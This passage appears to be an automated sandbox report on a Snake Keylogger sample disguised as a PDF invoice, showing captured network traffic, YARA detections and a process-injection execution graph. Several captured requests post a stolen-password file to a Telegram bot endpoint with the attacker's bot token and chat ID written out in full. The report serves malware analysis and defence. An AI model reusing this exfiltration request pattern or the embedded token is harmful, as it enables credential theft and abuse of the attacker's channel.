                                                                                    Data Ascii: {"ok":true,"result":{"message_id":160,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765220


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    61192.168.2.550047149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:47:01 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3cff5f9205ea
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:47:01 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 66 66 35 66 39 32 30 35 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3cff5f9205eaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:47:01 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:47:01 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:47:01 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 32 31
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":161,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765221


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    62192.168.2.550048149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:47:02 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3d400c0e6883
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:47:02 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 64 34 30 30 63 30 65 36 38 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3d400c0e6883Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:47:02 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:47:02 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:47:02 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 32 32
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":162,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765222


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    63192.168.2.550049149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:47:03 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3d7b19d7036b
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:47:03 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 64 37 62 31 39 64 37 30 33 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3d7b19d7036bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:47:03 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:47:03 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:47:03 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 32 33
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":163,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765223


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    64192.168.2.550050149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:47:05 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3dce322ca0e4
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:47:05 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 64 63 65 33 32 32 63 61 30 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3dce322ca0e4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:47:05 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:47:05 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:47:05 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 32 35
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":164,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765225


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    65192.168.2.550051149.154.167.220443
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:47:06 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3395b5bc7281
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:47:06 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 39 35 62 35 62 63 37 32 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3395b5bc7281Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:47:06 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:47:06 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:47:06 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 32 36
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":165,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765226


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:05:44:58
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe"
                                                                                    Imagebase:0x740000
                                                                                    File size:72'192 bytes
                                                                                    MD5 hash:C264894ED58FDB81E565236476BFE7CA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2221534683.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2208812518.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:05:45:15
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                    Imagebase:0x290000
                                                                                    File size:42'064 bytes
                                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3287740367.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3287740367.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:11.7%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:2.7%
                                                                                      Total number of Nodes:335
                                                                                      Total number of Limit Nodes:8
                                                                                      execution_graph 68592 66a8b6b 68593 66a8b75 68592->68593 68597 675a848 68593->68597 68604 675a838 68593->68604 68594 66a8bb3 68598 675a85d 68597->68598 68599 675a873 68598->68599 68612 675a8fc 68598->68612 68616 675a879 68598->68616 68620 675a888 68598->68620 68624 675acad 68598->68624 68599->68594 68605 675a846 68604->68605 68606 675a7f8 68604->68606 68607 675a873 68605->68607 68608 675acad 10 API calls 68605->68608 68609 675a8fc 10 API calls 68605->68609 68610 675a879 10 API calls 68605->68610 68611 675a888 10 API calls 68605->68611 68606->68594 68607->68594 68608->68607 68609->68607 68610->68607 68611->68607 68614 675a8e5 68612->68614 68613 675ac9e 68613->68599 68614->68613 68628 675c292 68614->68628 68618 675a8b2 68616->68618 68617 675ac9e 68617->68599 68618->68617 68619 675c292 10 API calls 68618->68619 68619->68618 68622 675a8b2 68620->68622 68621 675ac9e 68621->68599 68622->68621 68623 675c292 10 API calls 68622->68623 68623->68622 68625 675a8e5 68624->68625 68626 675ac9e 68625->68626 68627 675c292 10 API calls 68625->68627 68626->68599 68627->68625 68629 675c2b5 68628->68629 68630 675c2d7 68629->68630 68633 675c705 68629->68633 68638 675c4ec 68629->68638 68630->68614 68634 675c714 68633->68634 68643 675cb40 68634->68643 68659 675cb50 68634->68659 68635 675c786 68639 675c4f6 68638->68639 68640 675c786 68639->68640 68641 675cb50 10 API calls 68639->68641 68642 675cb40 10 API calls 68639->68642 68641->68640 68642->68640 68644 675cb4f 68643->68644 68646 675cafc 68643->68646 68645 675cb87 68644->68645 68674 675d68b 68644->68674 68680 675d960 68644->68680 68685 675e083 68644->68685 68690 675de47 68644->68690 68695 675dda6 68644->68695 68701 675d5a4 68644->68701 68706 675d564 68644->68706 68711 675e0db 68644->68711 68716 675db45 68644->68716 68721 675d178 68644->68721 68726 675d80a 68644->68726 68731 675dd89 68644->68731 68645->68635 68646->68635 68660 675cb65 68659->68660 68661 675d178 2 API calls 68660->68661 68662 675e0db 2 API calls 68660->68662 68663 675db45 2 API calls 68660->68663 68664 675d5a4 2 API calls 68660->68664 68665 675d564 2 API calls 68660->68665 68666 675de47 2 API calls 68660->68666 68667 675dda6 2 API calls 68660->68667 68668 675d960 2 API calls 68660->68668 68669 675e083 2 API calls 68660->68669 68670 675cb87 68660->68670 68671 675dd89 2 API calls 68660->68671 68672 675d68b 2 API calls 68660->68672 68673 675d80a 2 API calls 68660->68673 68661->68670 68662->68670 68663->68670 68664->68670 68665->68670 68666->68670 68667->68670 68668->68670 68669->68670 68670->68635 68671->68670 68672->68670 68673->68670 68675 675d10a 68674->68675 68676 675da66 68674->68676 68737 68e7860 68676->68737 68741 68e7858 68676->68741 68677 675db09 68677->68645 68681 675d96b 68680->68681 68745 68e7ace 68681->68745 68749 68e7ad0 68681->68749 68682 675d10a 68682->68645 68686 675e08c 68685->68686 68753 68e80e6 68686->68753 68757 68e80e8 68686->68757 68687 675e13d 68691 675de56 68690->68691 68693 68e7ace WriteProcessMemory 68691->68693 68694 68e7ad0 WriteProcessMemory 68691->68694 68692 675dec7 68693->68692 68694->68692 68696 675ddc2 68695->68696 68761 675e878 68696->68761 68782 675e888 68696->68782 68803 675e78d 68696->68803 68697 675ddda 68702 675d5b3 68701->68702 68905 68e72b0 68702->68905 68909 68e72b8 68702->68909 68703 675d10a 68707 675d571 68706->68707 68709 68e7858 VirtualAllocEx 68707->68709 68710 68e7860 VirtualAllocEx 68707->68710 68708 675e1d9 68709->68708 68710->68708 68712 675e0e5 68711->68712 68714 68e80e8 NtResumeThread 68712->68714 68715 68e80e6 NtResumeThread 68712->68715 68713 675e13d 68714->68713 68715->68713 68717 675db54 68716->68717 68719 68e7ace WriteProcessMemory 68717->68719 68720 68e7ad0 WriteProcessMemory 68717->68720 68718 675dbf0 68718->68645 68719->68718 68720->68718 68722 675d187 68721->68722 68724 68e72b8 Wow64SetThreadContext 68722->68724 68725 68e72b0 Wow64SetThreadContext 68722->68725 68723 675d10a 68724->68723 68725->68723 68727 675d814 68726->68727 68729 68e7858 VirtualAllocEx 68727->68729 68730 68e7860 VirtualAllocEx 68727->68730 68728 675db09 68728->68645 68729->68728 68730->68728 68732 675ddd4 68731->68732 68734 675e78d 2 API calls 68732->68734 68735 675e878 2 API calls 68732->68735 68736 675e888 2 API calls 68732->68736 68733 675ddda 68734->68733 68735->68733 68736->68733 68738 68e78a0 VirtualAllocEx 